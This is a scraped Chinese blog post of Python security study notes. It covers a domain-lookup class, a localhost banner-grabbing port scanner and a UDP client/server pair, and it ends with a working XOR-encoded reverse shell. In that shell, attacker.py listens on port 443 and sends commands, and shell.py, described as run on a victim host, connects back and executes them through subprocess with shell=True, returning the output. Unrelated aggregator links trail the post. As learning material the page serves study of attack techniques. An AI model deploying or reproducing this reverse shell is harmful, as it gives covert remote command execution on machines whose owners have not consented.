fb.python-study.1
来源:互联网 发布:火妹网络 编辑:程序博客网 时间:2024/05/18 09:03
0x01.python类
<p>#coding=utf-8import osclass Domain: def __init__(self,domain,port,protocol): self.domain=domain self.port=port self.protocol=protocol def URL(self): if self.protocol=='https': URL='https://'+self.domain+':'+self.port+'/' if self.protocol=='http': URL='http://'+self.domain+':'+self.port+'/' return URL def lookup(self): os.system("host "+self.domain) if __name__=="__main__": domain=Domain('www.freebuf.com','80','http') print domain.URL() print domain.port print domain.protocol domain.lookup() </p>
the end:
root@kali:~/Desktop# python ./test.py http://www.freebuf.com:80/80httpwww.freebuf.com has address 123.151.180.21
enviroment: kali+py2.7.3
0x02 scan port
开机了本机的ssh也就是22端口。一个简单的演示。
#coding=utf-8import socketports=[21,22,53,80,443,445,3389,5050,5678,8080,8081]hosts=['127.0.0.1']for host in hosts: for port in ports: try: s=socket.socket() print "[+]Attempting to connect to "+host+":"+str(port) s.connect((host,port)) s.send('adsfsafdsfadfsadfasdfasdfas /n') banner=s.recv(1024) if banner: print "[+]"+host+":"+str(port)+" open: \n"+banner s.close()except: pass结果:
root@kali:~/Desktop# python ./scan.py [+]Attempting to connect to 127.0.0.1:21[+]Attempting to connect to 127.0.0.1:22[+]127.0.0.1:22 open: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2[+]Attempting to connect to 127.0.0.1:53[+]Attempting to connect to 127.0.0.1:80[+]Attempting to connect to 127.0.0.1:443[+]Attempting to connect to 127.0.0.1:445[+]Attempting to connect to 127.0.0.1:3389[+]Attempting to connect to 127.0.0.1:5050[+]Attempting to connect to 127.0.0.1:5678[+]Attempting to connect to 127.0.0.1:8080[+]Attempting to connect to 127.0.0.1:8081
这只是个示例程序吧 不实用、在扫一下不能既recv又send的程序时,会卡在recv上
0x03 Reverse Shell – 反向shell
一个简单的udp server-client.py
#coding=utf-8import sockethost=''port=1024bufsize=128addr=(host,port)udp_server=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)udp_server.bind(addr)while True: print 'waiting for message...' data,addr=udp_server.recvfrom(bufsize) print '...received from and return to:'+str(addr)+": "+dataudp_server.close()
#coding=utf-8import sockethost='localhost'port=1024bufsize=128addr=(host,port)udp_client=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)while True: data=raw_input('>') if not data: break udp_client.sendto(data,addr)udp_client.close()
接下来是一个反向shell的演示程序。
attacker.py
#coding=utf-8import socket"""建立socket监听端口"""s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.bind(("0.0.0.0", 443))s.listen(2048)print "Listening on port 443... "#接受连接 得到肉鸡(client, (ip, port)) = s.accept()print " recived connection from : ", ipwhile True: command = raw_input('~$ ') encode = bytearray(command) for i in range(len(encode)): encode[i] ^= 0x41 client.send(encode)#send en_data = client.recv(2048)#recv decode = bytearray(en_data) for i in range(len(decode)): decode[i] ^= 0x41 print decodeclient.close()s.close()
shell.py
#!/usr/bin/pythonimport socket, subprocess, sysRHOST = sys.argv[1]RPORT = 443s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((RHOST, RPORT))while True: # receive XOR encoded data from network socket data = s.recv(1024) # XOR the data again with a '\x41' to get back to normal data en_data = bytearray(data) for i in range(len(en_data)): en_data[i] ^= 0x41 # Execute the decode data as a command. # The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable comm = subprocess.Popen(str(en_data), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE) comm.wait() STDOUT, STDERR = comm.communicate() print STDERR # Encode the output and send to RHOST en_STDOUT= bytearray(STDOUT) for i in range(len(en_STDOUT)): en_STDOUT[i] ^= 0x41 s.send(en_STDOUT)s.close()
从中可以看书 攻击者开启自己的443端口,然后在受害者上运行shell.py可使受害机器连接的攻击者的机器上,同时实用subprocess模块 执行由attacker发过来的命令,并将受害机器的命令回显发回到攻击者的机器上。 相当于一个远程shell吧。 并不是最标准的交互式shell。(nc反弹拿shell)
0 0
- fb.python-study.1
- Self-study python(1)
- Python Study Note 1
- Python study
- fb
- 【FB】
- python study ---- encoding/deconding
- python study ---- modules
- Study Python -- 简介
- python study ------- zip function
- python String Study log
- Python Study Record 01
- python study note
- python study 2
- Python Study OOP
- parrallel python study notes
- Python 之study
- python study notes
- java项目部署到weblogic上后,某些浏览器无法取得session值
- iOS开源项目分类及介绍
- printf输出格式总结
- leetcode题解||Reverse Integer 问题
- 在Mac OS X上使用HAXM加速Android Emulator
- fb.python-study.1
- How to Determine the Cipher Suite for the Server and Client
- windows窗口系统的核心:消息管理
- xmpp协议学习笔记2
- Network Stack learning II
- 在线手册 | thinkphp 简单心德
- [积累] javadoc生成出现错误“编码 GBK 的不可映射字符”
- 【LeetCode从零单排】No 3 Longest Substring Without Repeating Characters
- iOS---------UITextField 转载修改文